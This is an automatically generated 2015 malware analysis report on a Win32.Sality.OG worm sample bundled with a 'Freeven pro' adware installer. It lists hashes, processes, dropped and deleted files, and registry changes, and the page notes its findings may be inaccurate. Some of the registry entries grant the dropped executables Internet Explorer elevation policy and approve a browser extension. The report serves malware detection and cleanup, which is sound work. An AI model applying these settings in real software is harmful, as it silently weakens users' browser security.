Win32.Sality.OG_415abb1224

by malwarelabrobot on March 31st, 2015 in Malware Descriptions.

Win32.Sality.OG (B) (Emsisoft), Win32.Sality.OG (AdAware), VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Worm, Virus, WormAutorun

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 415abb1224ff6404d48545f6388ac3ca
SHA1: 3d2d60a8ce4e5b67c30ea8079d8d257f6acc1cbf
SHA256: 4fbc2dc03f1cc6a403e08229985aff15c861b89424e9be877760b1d7d5f4ed05
SSDeep: 196608:qlZSTsr63ezVpLmpbAgMSSVDh7tpsE2jJ:2xW3ehpGbchLps/F
Size: 7070840 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: AirInstaller
Created at: 2012-12-04 15:55:02
Analyzed on: WindowsXP SP3 32-bit

Summary:

Worm. A program that is primarily replicating on networks or removable drives.

Payload

Behaviour	Description
WormAutorun	A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.

Process activity

The Worm creates the following process(es):

875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe:2560
Qvalysaly.exe:2176
%original file name%.exe:1860
875f2efa-2a31-4c0f-be39-9293cb48929c-4.exe:1180
875f2efa-2a31-4c0f-be39-9293cb48929c-3.exe:508
WINMINE.EXE:1048
WINMINE.EXE:3776
WINMINE.EXE:544
Freeven pro-codedownloader.exe:2144
Freeven pro-codedownloader.exe:720
NOTEPAD.EXE:2288
NOTEPAD.EXE:2120
NOTEPAD.EXE:2332
NOTEPAD.EXE:556
NOTEPAD.EXE:836
NOTEPAD.EXE:2228
NOTEPAD.EXE:3472
NOTEPAD.EXE:2524
NOTEPAD.EXE:2604
NOTEPAD.EXE:3804
NOTEPAD.EXE:2896
NOTEPAD.EXE:3944
NOTEPAD.EXE:1136
NOTEPAD.EXE:3852
NOTEPAD.EXE:2152
NOTEPAD.EXE:296
NOTEPAD.EXE:2516
NOTEPAD.EXE:2188
NOTEPAD.EXE:3896
netsh.exe:2816
netsh.exe:872
notepad.exe:2056
regsvr32.exe:2376
Freeven pro-bg.exe:2444

The Worm injects its code into the following process(es):

netsh.exe:3068
Explorer.EXE:884

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Qvalysaly.exe:2176 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\update[1].json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\72.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\93.js (793 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\1.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\104.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\ExecDos.dll (5 bytes)
%Program Files%\Freeven pro\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\md5dll.dll (6 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-4.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode\extension.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\14.js (784 bytes)
%Program Files%\Freeven pro\Freeven pro-bg.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\141988 (195663 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\64.js (2 bytes)
%Program Files%\Freeven pro\utils.exe (68126 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\46.js (2 bytes)
%Program Files%\Freeven pro\54248.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\13.js (6 bytes)
%Program Files%\Freeven pro\Freeven pro-codedownloader.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\223.js (453 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-4.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\42.js (6 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-3.job (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\246.js (2 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-3.exe (13122 bytes)
%Program Files%\Freeven pro\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\39.js (4 bytes)
%Program Files%\Freeven pro\360-54248.crx (1425 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-5.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\91.js (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\4.js (3312 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-2.job (70 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-1.job (70 bytes)
%Program Files%\Freeven pro\54248.xpi (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\207.js (1 bytes)
%WinDir%\Tasks\temp_875f2efa-2a31-4c0f-be39-9293cb48929c-2.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\191.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins.json (12 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-5.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\37.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\103.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\244.js (501 bytes)
%Program Files%\Freeven pro\Freeven pro.ico (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\InstallerUtils.dll (25776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\462018 (741774 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\17.js (2392 bytes)
%Program Files%\Freeven pro\Freeven pro-bho.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx5.tmp (288023 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\102.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\update.json (39 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\40.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\39.js (0 bytes)
%WinDir%\Tasks\temp_875f2efa-2a31-4c0f-be39-9293cb48929c-2.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\manifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\1.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\104.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\38.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode\extension.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\182.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\14.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\44.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\28.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\35.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\64.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\207.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\13.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\223.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\46.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\22.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\42.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\141988 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\246.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\103.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\94.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\21.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\91.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\242.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\177.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\4.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\43.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\191.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\78.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\2.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode\background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\36.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\184.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\37.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\45.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\41.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\244.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\update.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\47.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\3.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\93.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\183.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\462018 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\17.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\102.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\72.js (0 bytes)

The process %original file name%.exe:1860 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%WinDir%\system.ini (72 bytes)
%Program Files%\Adobe\Reader 9.0\Reader\READER_SL.EXE (432 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\Jdwqkklr.tmp (217971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\Qvalysaly.exe (861462 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\WrapperUtils.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\rmlukm.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp (232535 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00125F9D_Rar\%original file name%.exe (53142 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\StdUtils.dll (14 bytes)

The Worm deletes the following file(s):

C:\1268b5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\WrapperUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\Jdwqkklr.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\Qvalysaly.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\rmlukm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\StdUtils.dll (0 bytes)

The process Freeven pro-codedownloader.exe:2144 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\220[1].js (19033 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\273[1].js (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\plugins[1].json (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\375[1].js (679 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\195[1].js (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\set_campaign_id_m[1].js (508 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\102[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\380[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\200[1].js (807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\9[1].js (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\233[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\184[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\7[1].js (683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\391[1].js (795 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\193[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\jquery-1_7_1_min[1].js (44457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\246[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\253[1].js (735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\354[1].js (60025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\242[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\334[1].js (967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\376[1].js (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\223[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\288[1].js (963 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\app_code[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\180[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\42[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\281[1].js (455 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\390[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\91[1].js (87921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\230[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\221[1].js (413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\345[1].js (645 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\260[1].js (823 bytes)

Registry activity

The process 875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe:2560 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 70 A8 35 12 DD FA 56 E9 E9 FA B5 DB 85 9F 5A"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{974EFC85-F703-400D-9C26-E221ADA87A77}]
"AppName" = "875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe-helper.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B8DE1ED5-AE5C-46B0-977B-DB47DDB4BEB0}]
"AppName" = "875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe-codedownloader.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E09BE7F8-87B7-4C2F-A91B-A1AB8136E2E0}]
"AppPath" = "%Program Files%\Freeven pro"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{974EFC85-F703-400D-9C26-E221ADA87A77}]
"Policy" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E09BE7F8-87B7-4C2F-A91B-A1AB8136E2E0}]
"Policy" = "3"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"{11111111-1111-1111-1111-110511421148}" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{11111111-1111-1111-1111-110511421148}" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E09BE7F8-87B7-4C2F-A91B-A1AB8136E2E0}]
"AppName" = "875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe-buttonutil.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1D66F07-4C64-4269-A437-CF91D56C0C8}]
"AppPath" = "%Program Files%\Freeven pro"
"Policy" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{974EFC85-F703-400D-9C26-E221ADA87A77}]
"AppPath" = "%Program Files%\Freeven pro"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B8DE1ED5-AE5C-46B0-977B-DB47DDB4BEB0}]
"Policy" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1D66F07-4C64-4269-A437-CF91D56C0C8}]
"AppName" = "875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe-buttonutil64.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B8DE1ED5-AE5C-46B0-977B-DB47DDB4BEB0}]
"AppPath" = "%Program Files%\Freeven pro"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"Timestamp"

The process Qvalysaly.exe:2176 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"DisplayVersion" = "1.34.5.4"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn6.tmp\extensionData\,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"UninstallString" = "%Program Files%\Freeven pro\Uninstall.exe /fcp=1"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"Freeven pro-bg.exe" = "8000"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Freeven pro\Installer]
"BundledFirefox" = "1"

[HKCU\Software\InstalledBrowserExtensions\Freeven]
"54248" = "Freeven pro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\InstalledBrowserExtensions\21636]
"54248" = "Freeven pro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\InstalledBrowserExtensions\21636\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"CrPublisherId" = "21636"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"Policy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"AppPath" = "%Program Files%\Freeven pro"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21636]
"54248" = "Freeven pro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21636\Status]
"Installed" = "1"

